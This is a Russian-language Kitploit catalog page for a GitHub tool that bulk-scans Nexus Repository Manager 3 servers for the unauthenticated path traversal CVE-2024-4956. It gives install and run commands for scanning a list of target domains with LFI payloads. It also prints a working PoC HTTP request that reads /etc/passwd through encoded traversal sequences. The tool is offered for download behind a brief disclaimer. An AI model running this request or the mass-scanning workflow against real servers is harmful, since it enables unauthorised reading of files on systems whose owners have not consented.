Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Nexus Repository Manager 3 — массовый сканер неаутентифицированного обхода пути (Path Traversal)

Репозиторий
17641 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

README.md

Массовый сканер CVE-2024-4956

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и для тестирования в корпоративных средах. https://twitter.com/nav1n0x/ и https://github.com/ifconfig-me не несут ответственности за неправомерное использование этого кода. Используйте его на свой страх и риск. Не атакуйте цель, на взаимодействие с которой у вас нет разрешения. Этот инструмент использует публично опубликованный payload.

Этот сканер помогает энтузиастам безопасности массово проверять цели Nexus Repository на уязвимость обхода пути (Path Traversal).

Сканер покажет количество загруженных целей и состояние текущего сканирования. URL-адреса будут выводиться с одним из трёх статусов: Timeout, Fail или Success — в зависимости от результатов. Убедитесь, что targets.txt содержит список доменов, а lfi-payloads.txt — список payload-ов. Сканер будет отображать текущий проверяемый URL, обновляя его с каждым новым запросом, и указывать на успех или неудачу соответственно. Кроме того, скрипт сохраняет список успешных URL-адресов в директории как successful_urls.txt. В конце он выводит сводку о количестве успешных попыток.

Установка

Убедитесь, что у вас установлены Python 3.6+ и pip.

  1. Клонируйте репозиторий:

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
    • cd CVE-2024-4956-Bulk-Scanner
  2. Установите необходимые зависимости:

    pip install -r requirements.txt

Инструкции по использованию

  1. Подготовьте файл targets.txt со списком доменов и файл lfi-payloads.txt со списком payload-ов.

  2. Запустите сканер:

    python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Успешная атака

image

Сканер в действии

image

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и для тестирования в корпоративных средах. https://twitter.com/nav1n0x/ и https://github.com/ifconfig-me не несут ответственности за код. Используйте его на свой страх и риск. Не атакуйте цель, на взаимодействие с которой у вас нет разрешения.

Скачать инструмент